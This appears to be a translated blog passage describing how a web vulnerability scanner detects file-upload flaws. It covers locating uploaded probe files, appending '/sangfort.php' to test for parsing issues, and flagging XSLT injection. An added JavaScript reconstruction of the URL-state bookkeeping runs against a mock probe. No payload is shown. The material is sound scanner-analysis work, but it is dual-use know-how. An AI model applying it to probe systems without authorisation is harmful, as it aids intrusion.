2.2.3 If neither 2.2.1 nor 2.2.2 succeeded, create the variable fileExt = getFileExt(filename), the suffix of the file name. If fileExt is set and the array links exists (it was created in 2.2.2), create a new array newLinks = new TStringList(); for every value in links that ends with "." + fileExt, add that value to newLinks.

If newLinks is not empty, assign its length to the variable linksCount; linksCount may not exceed 5, and is reset to 5 if it is greater. If the url is served over http and has a domain name (baseDomain), cut the url at the last "/" of the scanned file path, store that prefix in this.uploadURLs[varIndex], and set this.foundOneUploadURL = true. If lookFor (passed in when the function is called) == detectURLstr (sangforr-file-upload-test), call alert() and return true, leaving the function.

2.2.4 If 2.2.3 also fails, change this.uploadURLs[varIndex] from '{TO_BE_DETECTED}' to '{NOT_FOUND}'.

2.3 If the value of this.uploadURLs[varIndex] is none of {NOT_FOUND}, {TO_BE_DETECTED} or {BRUTEFORCE}:

If this.uploadURLs[varIndex] != '', create the object canonUrl.

If appendPHPFilename (passed in when the function is called) == 1, then canonUrl = new TURL(this.uploadURLs[varIndex] + filename + '/sangfort.php'); otherwise canonUrl = new TURL(this.uploadURLs[varIndex] + filename).

Then call **TestUploadedFileOnUrl()**; if it returns true and lookFor (passed in when the function is called) == detectURLstr (sangforr-file-upload-test), call alert() and return true, leaving the function.

3.0 If none of the above conditions is met, there is no file upload vulnerability; return false.
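Steps 2.1 to 3.0 are a small state machine per file input: the entry in this.uploadURLs starts as {TO_BE_DETECTED}, becomes the directory prefix where a probe file was first found, and becomes {NOT_FOUND} when neither the scanned directory, nor links naming the file, nor the first five links with the same extension yield it. As an added example (not the scanner's code), the block below reconstructs that bookkeeping as one pure function driven by a probe callback that stands in for TestUploadedFileOnUrl(). The three state markers and the cap of 5 are the page's; the function names, the probe callback, the sample URLs and the choice to verify every candidate link before storing it (the page does not say whether the scanner does) are this example's assumptions.

```javascript
// Added example, not the scanner's code: a reconstruction of the upload-URL bookkeeping
// described in steps 2.1 to 3.0 as one pure function. The state markers are the page's;
// the function names, the probe callback (standing in for TestUploadedFileOnUrl()) and the
// sample URLs are assumptions. Every candidate link is verified before it is stored.

const TO_BE_DETECTED = "{TO_BE_DETECTED}";
const BRUTEFORCE = "{BRUTEFORCE}";
const NOT_FOUND = "{NOT_FOUND}";
const MAX_EXT_CANDIDATES = 5;                 // the cap on linksCount in step 2.2.3

// Directory prefix of a URL: everything up to and including the last "/".
function dirOf(url) { return url.slice(0, url.lastIndexOf("/") + 1); }

function fileExt(name) {
  const dot = name.lastIndexOf(".");
  return dot < 0 ? "" : name.slice(dot + 1);
}

// Keep only absolute http(s) links with a host part, matching the page's "served over
// http and has a domain name" condition.
function absoluteLinks(links) { return links.filter((l) => /^https?:\/\/[^/]+\//.test(l)); }

// state:    current this.uploadURLs[varIndex] for this input
// scanUrl:  URL of the page whose form was submitted
// links:    links parsed from the upload response (pd.getLinks())
// probe:    url => boolean, true when the uploaded marker is served at url
// Returns { state, url }: the new state and the URL at which the file was found, or null.
function locateUpload(state, scanUrl, filename, links, probe) {
  if (state === NOT_FOUND) return { state, url: null };           // 2.1: give up at once
  if (state !== TO_BE_DETECTED && state !== BRUTEFORCE) {          // 2.3: directory already known
    const url = state + filename;
    return { state, url: probe(url) ? url : null };
  }
  const direct = dirOf(scanUrl) + filename;                         // 2.2.1: beside the scanned page
  if (probe(direct)) return { state: dirOf(direct), url: direct };
  const abs = absoluteLinks(links);
  for (const l of abs.filter((l) => l.includes(filename))) {        // 2.2.2: links naming the file
    if (probe(l)) return { state: dirOf(l), url: l };
  }
  const ext = fileExt(filename);
  if (ext) {                                                         // 2.2.3: same extension, at most 5
    for (const l of abs.filter((l) => l.endsWith("." + ext)).slice(0, MAX_EXT_CANDIDATES)) {
      if (probe(l)) return { state: dirOf(l), url: l };
    }
  }
  return { state: NOT_FOUND, url: null };                            // 2.2.4
}

// Constructed scenario: the application stores uploads under /files/ and links to them.
const SCAN_URL = "http://app.example/upload/form.php";
const SERVED = new Set([
  "http://app.example/files/SanTest42.jpg",
  "http://app.example/files/SanTest43.php.jpg",
]);

// A probe that records every URL it was asked about, so the request count is visible.
function makeProbe(served) {
  const calls = [];
  const probe = (url) => { calls.push(url); return served.has(url); };
  return { probe, calls };
}

function demo() {
  const { probe, calls } = makeProbe(SERVED);
  const first = locateUpload(TO_BE_DETECTED, SCAN_URL, "SanTest42.jpg",
    ["/relative/a.jpg", "http://app.example/files/SanTest42.jpg"], probe);
  // With the directory learned, the next file is looked for only there.
  const second = locateUpload(first.state, SCAN_URL, "SanTest43.php.jpg", [], probe);
  return { first, second, probes: calls.length };
}

console.log(demo());
```

The request budget is the point of the state: once a directory is known, each further file costs a single request, and once {NOT_FOUND} is recorded, later calls cost nothing. The cap of five extension-matched links bounds the worst case on pages that list many images, at the price of missing an uploaded file that is linked further down.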

TestUploadedFileOnUrl()

Send the request directly (the request details are passed in when the function is called). If the response contains the variable searchStr (passed in when the function is called) and its content type equals the variable expectedContentType (passed in when the function is called), return true; otherwise return false.

existFileUpload()

Create a TList fileInputList for all file inputs.

For each input, check whether its type is file; if so, add it to fileInputList.

If fileInputList is not empty, submit it to the framework function selectVariationsForInputList; this function registers the inputs with the framework.

Then use setInputFileName, setInputContentType and setInputValue in turn to set the file name, the content type and the file content for each entry of fileInputList (this is where the random string goes).

Then send a request carrying the random string. If the response does not report an error, or the error code is 0xF0003, and the response contains the random string that was sent, call alertXSLT().

alertXSLT() reports the XSLT_injection.xml vulnerability.


Origin: blog.csdn.net/weixin_46706771/article/details/125682422